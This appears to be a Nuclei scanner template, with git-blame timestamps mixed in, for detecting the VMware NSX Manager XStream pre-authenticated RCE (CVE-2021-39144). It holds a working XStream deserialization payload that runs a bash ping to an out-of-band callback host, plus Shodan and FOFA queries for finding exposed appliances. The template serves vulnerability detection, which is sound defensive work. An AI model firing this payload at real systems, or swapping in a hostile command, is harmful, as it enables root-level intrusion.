2022-12-11 10:19:35 +00:00
|
|
|
id: vmware-nsx-stream-rce
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: VMware NSX Manager XStream Pre-authenticated Remote Code Execution
|
|
|
|
author: _0xf4n9x_
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.
|
|
|
|
VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
|
|
|
|
Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
|
|
|
|
a malicious actor can get remote code execution in the context of 'root' on the appliance.
|
|
|
|
VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13
|
|
|
|
are vulnerable to Remote Command Injection.
|
|
|
|
reference:
|
|
|
|
- https://www.vmware.com/security/advisories/VMSA-2022-0027.html
|
|
|
|
- https://kb.vmware.com/s/article/89809
|
|
|
|
- https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html
|
|
|
|
- https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144
|
|
|
|
- https://github.com/rapid7/metasploit-framework/pull/17222
|
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 2
|
2022-12-11 10:19:35 +00:00
|
|
|
verified: true
|
|
|
|
shodan-query: title:"VMware Appliance Management"
|
|
|
|
fofa-query: title="VMware Appliance Management"
|
2023-01-05 11:21:19 +00:00
|
|
|
tags: vmware,xstream,rce,msf
|
2022-12-11 10:19:35 +00:00
|
|
|
|
|
|
|
variables:
|
|
|
|
lowerrstr: "{{to_lower(rand_text_alpha(6))}}"
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-12-11 10:19:35 +00:00
|
|
|
- raw:
|
|
|
|
- |-
|
|
|
|
PUT /api/2.0/services/usermgmt/password/{{lowerrstr}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/xml
|
|
|
|
|
|
|
|
<sorted-set>
|
|
|
|
<string>foo</string>
|
|
|
|
<dynamic-proxy>
|
|
|
|
<interface>java.lang.Comparable</interface>
|
|
|
|
<handler class="java.beans.EventHandler">
|
|
|
|
<target class="java.lang.ProcessBuilder">
|
|
|
|
<command>
|
|
|
|
<string>bash</string>
|
|
|
|
<string>-c</string>
|
|
|
|
<string>ping {{os}}.{{interactsh-url}}</string>
|
|
|
|
</command>
|
|
|
|
</target>
|
|
|
|
<action>start</action>
|
|
|
|
</handler>
|
|
|
|
</dynamic-proxy>
|
|
|
|
</sorted-set>
|
|
|
|
|
|
|
|
payloads:
|
|
|
|
os:
|
|
|
|
- '-c 3 lin'
|
|
|
|
- '-n 3 win'
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol
|
|
|
|
words:
|
|
|
|
- "dns"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'deceptive request routing'
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 400
|